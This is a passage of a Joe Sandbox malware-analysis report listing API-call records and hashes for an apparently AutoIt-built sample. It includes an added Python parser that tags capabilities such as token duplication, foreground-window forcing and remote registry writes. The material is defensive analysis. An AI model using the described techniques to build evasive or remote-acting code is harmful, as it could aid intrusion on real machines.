                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4C81D
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4C844
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C890
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C8D3
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C927
                                                                                                                              • Part of subcall function 00F03698: __woutput_l.LIBCMT ref: 00F036F1
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C975
                                                                                                                              • Part of subcall function 00F03698: __flsbuf.LIBCMT ref: 00F03713
                                                                                                                              • Part of subcall function 00F03698: __flsbuf.LIBCMT ref: 00F0372B
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C9C4
                                                                                                                            • __swprintf.LIBCMT ref: 00F4CA13
                                                                                                                            • __swprintf.LIBCMT ref: 00F4CA62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                            • API String ID: 3953360268-2428617273
                                                                                                                            • Opcode ID: 2d219ef782530690096655e5bd85b09bd3e60d76a51650e8aac0104cf5fd9487
                                                                                                                            • Instruction ID: df514b92203c02664fb2027fb7d7fce10f4b335bedd9147db340be587815b717
                                                                                                                            • Opcode Fuzzy Hash: 2d219ef782530690096655e5bd85b09bd3e60d76a51650e8aac0104cf5fd9487
                                                                                                                            • Instruction Fuzzy Hash: C3A14DB2408348ABC710EFA5CC85DAFB7ECEF85704F401929F59597192EB35DA08CB62
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F4EFB6
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4EFCB
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4EFE2
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F4EFF4
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00F4F00E
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F4F026
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F031
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F4F04D
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F074
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F08B
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4F09D
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00F98920), ref: 00F4F0BB
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4F0C5
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F0D2
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F0E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1803514871-438819550
                                                                                                                            • Opcode ID: 0a8057cf41c8291dee7ab43a83f1cef4d577d111575e7b74d050fafad92ee65e
                                                                                                                            • Instruction ID: e9a55e5473999618bec346f712ebabc82b7e527d63e5330abccd26ac580cad68
                                                                                                                            • Opcode Fuzzy Hash: 0a8057cf41c8291dee7ab43a83f1cef4d577d111575e7b74d050fafad92ee65e
                                                                                                                            • Instruction Fuzzy Hash: 3431E53290120D6ADB14DBA8EC49AEE7BAC9F85360F140176EC19D20A1DB70DA48FE61
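The API lists in these function records are what an analyst reads to decide what each routine of the unpacked binary can do. The GetForegroundWindow / AttachThreadInput / keybd_event(0x12) / SetForegroundWindow sequence is the well-known way to defeat the foreground-lock and force a window to the front by attaching to the foreground thread's input queue and tapping Alt (VK_MENU), consistent with the AutoIt runtime this report says the sample was built with; DuplicateTokenEx followed by OpenWindowStationW("winsta0") and OpenDesktopW("default") is the preparation for starting a process on the interactive desktop under another token; RegConnectRegistryW before RegCreateKeyExW / RegSetValueExW means the registry write can target a remote machine. The following is an added example, not Joe Sandbox's code and not part of the sample: it parses records in this report's format and tags such capabilities. The record grammar is inferred from the page, the rule table is an assumption, and SAMPLE is an abbreviated excerpt of records from this report.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records and tag what each function can do.
Added example; record format inferred from the report text, rule table is illustrative."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Matches "• Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(...), ref: 00F3882B"
# and argument-less lines such as "• _memset.LIBCMT ref: 00F38353".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
VK_MENU = "00000012"  # Alt key, as the report prints the first keybd_event argument

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: Optional[str] = None  # set when the call lives in a callee, not this function

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, list[str]] = field(default_factory=dict)

    def api_names(self) -> set[str]:
        return {c.api for c in self.apis}

def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; every record begins at an 'APIs' heading."""
    records: list[FunctionRecord] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = API_LINE.match(line)
        if section == "APIs" and m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key, val = m["key"].strip(), m["val"].strip()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]  # report joins strings with '$'
            else:
                cur.meta.setdefault(key, []).append(val)
    return records

# (label, APIs that must all appear in the record); assumed rule set, extend as needed
RULES = [
    ("forces foreground window (AttachThreadInput + synthetic Alt keypress)",
     {"AttachThreadInput", "keybd_event", "SetForegroundWindow"}),
    ("duplicates a token and opens winsta0/default desktop",
     {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"}),
    ("adjusts token privileges", {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}),
    ("writes registry values via RegConnectRegistry (remote-capable)",
     {"RegConnectRegistryW", "RegCreateKeyExW", "RegSetValueExW"}),
    ("walks a directory tree changing file attributes",
     {"FindFirstFileW", "FindNextFileW", "SetFileAttributesW", "SetCurrentDirectoryW"}),
]

def tag_capabilities(rec: FunctionRecord) -> list[str]:
    names = rec.api_names()
    return [label for label, needed in RULES if needed <= names]

def alt_key_events(rec: FunctionRecord) -> int:
    """Count keybd_event calls whose first argument is VK_MENU (0x12)."""
    return sum(1 for c in rec.apis if c.api == "keybd_event" and c.args[:1] == [VK_MENU])

# Abbreviated excerpt of three records from this report (constructed test input).
SAMPLE = """\
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00EE48DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F1D665
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1D6BF
• SetForegroundWindow.USER32(?), ref: 00F1D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D6E7
• keybd_event.USER32(00000012,00000000), ref: 00F1D6F2
• keybd_event.USER32(00000012,00000000), ref: 00F1D701
Strings
Similarity
• String ID: Shell_TrayWnd
• Opcode ID: 283496f95ce87a3500d2732ff5d8915c5c81698982613b23db4a06f4d8607782
APIs
  • Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
  • Part of subcall function 00F387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
• _memset.LIBCMT ref: 00F38353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F383A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F383CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F3840A
Strings
Similarity
• String ID: $default$winsta0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F60953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00F6F910,00000000,?,00000000,?,?), ref: 00F609C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F60A92
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, sorted(rec.api_names()), alt_key_events(rec), tag_capabilities(rec))
```

Feed it the text of a whole function-analysis section (the "Download File" link text and indentation are stripped by the parser) and the tagged records give a quick map of which routines of the unpacked AutoIt runtime are worth opening in the disassembler; the `ref` addresses carry straight into IDA against the same memory dump.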
                                                                                                                            APIs
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F60953
                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F6F910,00000000,?,00000000,?,?), ref: 00F609C1
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F60A09
                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F60A92
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F60DB2
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F60DBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                            • API String ID: 536824911-966354055
                                                                                                                            • Opcode ID: 5c6d8b9ca52f692565eb148413c6a8033c287c352a7914c0c56cbd3cf9acc894
                                                                                                                            • Instruction ID: 05e1f8fb19366ffc61f1cff1a4471cc8961ee0b7512df7af642a47115852cca0
                                                                                                                            • Opcode Fuzzy Hash: 5c6d8b9ca52f692565eb148413c6a8033c287c352a7914c0c56cbd3cf9acc894
                                                                                                                            • Instruction Fuzzy Hash: C0027B75600645AFCB54EF25C841E2AB7E5FF89324F14855CF89AAB3A2CB30ED01DB81
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F4F113
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F128
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F13F
                                                                                                                              • Part of subcall function 00F44385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F443A0
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F4F16E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F179
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F4F195
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F1BC
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F1D3
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4F1E5
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00F98920), ref: 00F4F203
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4F20D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F21A
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F22C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1824444939-438819550
                                                                                                                            • Opcode ID: 4262762a132e523ef0471a62d24de3fe5fc0638637c32a53b5dce6498227e1e1
                                                                                                                            • Instruction ID: 856124c65964bb35cf4cf8e60c5180dafb756eccc435a2cfa1c0f7e7898f35c5
                                                                                                                            • Opcode Fuzzy Hash: 4262762a132e523ef0471a62d24de3fe5fc0638637c32a53b5dce6498227e1e1
                                                                                                                            • Instruction Fuzzy Hash: 1331E73690121E6ADF109F64EC59AEE7BAC9F85370F140171EC18E21A0DB74DF49FA54
                                                                                                                            APIs
                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F4A20F
                                                                                                                            • __swprintf.LIBCMT ref: 00F4A231
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F4A26E
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F4A293
                                                                                                                            • _memset.LIBCMT ref: 00F4A2B2
                                                                                                                            • _wcsncpy.LIBCMT ref: 00F4A2EE
                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F4A323
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4A32E
                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00F4A337
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4A341
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                            • API String ID: 2733774712-3457252023
                                                                                                                            • Opcode ID: 43c935ff54b36bd18fda3b5ed50841383c370976c578027e50a7acb545a7bce3
                                                                                                                            • Instruction ID: 25cc4bbd24a69643c498b892e086aca131b6a271ba703142714542bf3da835be
                                                                                                                            • Opcode Fuzzy Hash: 43c935ff54b36bd18fda3b5ed50841383c370976c578027e50a7acb545a7bce3
                                                                                                                            • Instruction Fuzzy Hash: 8431D4B1940109ABDB21DFA0DC49FEB37BCEF89750F1041B6F918D2160E7B59784AB25
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F38202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F3821E
                                                                                                                              • Part of subcall function 00F38202: GetLastError.KERNEL32(?,00F37CE2,?,?,?), ref: 00F38228
                                                                                                                              • Part of subcall function 00F38202: GetProcessHeap.KERNEL32(00000008,?,?,00F37CE2,?,?,?), ref: 00F38237
                                                                                                                              • Part of subcall function 00F38202: HeapAlloc.KERNEL32(00000000,?,00F37CE2,?,?,?), ref: 00F3823E
                                                                                                                              • Part of subcall function 00F38202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F38255
                                                                                                                              • Part of subcall function 00F3829F: GetProcessHeap.KERNEL32(00000008,00F37CF8,00000000,00000000,?,00F37CF8,?), ref: 00F382AB
                                                                                                                              • Part of subcall function 00F3829F: HeapAlloc.KERNEL32(00000000,?,00F37CF8,?), ref: 00F382B2
                                                                                                                              • Part of subcall function 00F3829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F37CF8,?), ref: 00F382C3
                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F37D13
                                                                                                                            • _memset.LIBCMT ref: 00F37D28
                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F37D47
                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F37D58
                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00F37D95
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F37DB1
                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F37DCE
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F37DDD
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00F37DE4
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F37E05
                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00F37E0C
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F37E3D
                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F37E63
                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F37E77
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3996160137-0
                                                                                                                            • Opcode ID: f46b006dcada1a30ae321d9e71fb6fe7bc0693c99fcf5c03ff2ed6f941458f46
                                                                                                                            • Instruction ID: 54c995faf51e5aaa6fa246c01892dac9adc2dd133ee1b1c6d07cb82786ab160b
                                                                                                                            • Opcode Fuzzy Hash: f46b006dcada1a30ae321d9e71fb6fe7bc0693c99fcf5c03ff2ed6f941458f46
                                                                                                                            • Instruction Fuzzy Hash: C4614CB1904209BFDF109FA4DC44AAEBB79FF08720F048169F815A6291DB759A05EB60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                                                                                            • API String ID: 0-4228276721
                                                                                                                            • Opcode ID: 93bf6c7959112157b400f191a6b582b542dea56c43574204361fde3f52145c3b
                                                                                                                            • Instruction ID: 45bf8bae51b7527fc3e574b08b52c1b107ed7f3b6c2c9eb20518448cd9f5e01c
                                                                                                                            • Opcode Fuzzy Hash: 93bf6c7959112157b400f191a6b582b542dea56c43574204361fde3f52145c3b
                                                                                                                            • Instruction Fuzzy Hash: 52726F71E002199BDB24CF58C8817FEB7B5FF44720F14816AE949FB291EB709941DB90
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40097
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F40102
                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00F40122
                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00F40139
                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00F40168
                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00F40179
                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00F401A5
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00F401B3
                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00F401DC
                                                                                                                            • GetKeyState.USER32(00000012), ref: 00F401EA
                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00F40213
                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00F40221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 541375521-0
                                                                                                                            • Opcode ID: 3b9acaa7edaed5bb37e70b0e6f59675607849c99f1564ef848c53f5d6d72b197
                                                                                                                            • Instruction ID: 113367c4953e52dff78f13f356299dba52dc9088ac6d2d4db620e9d45b2e1e69
                                                                                                                            • Opcode Fuzzy Hash: 3b9acaa7edaed5bb37e70b0e6f59675607849c99f1564ef848c53f5d6d72b197
                                                                                                                            • Instruction Fuzzy Hash: 0251CC20D0478819FB35DBA488547AABFB49F41390F08459EDEC25B5C3DEB49B8CEB61
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F604AC
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F6054B
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F605E3
                                                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F60822
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F6082F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1240663315-0
                                                                                                                            • Opcode ID: 0e666560090d8530360e727319a54fa2ca1fa58b3da194614db492458e6ddce0
                                                                                                                            • Instruction ID: 838bcaf8e709699976a93495572837d29403885c32c5adf508e66701b970c1a9
                                                                                                                            • Opcode Fuzzy Hash: 0e666560090d8530360e727319a54fa2ca1fa58b3da194614db492458e6ddce0
                                                                                                                            • Instruction Fuzzy Hash: 49E15D71604204AFCB14DF25C891E2BBBE4EF89314F14856DF85ADB2A2DB31ED05DB91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • CoInitialize.OLE32 ref: 00F58403
                                                                                                                            • CoUninitialize.OLE32 ref: 00F5840E
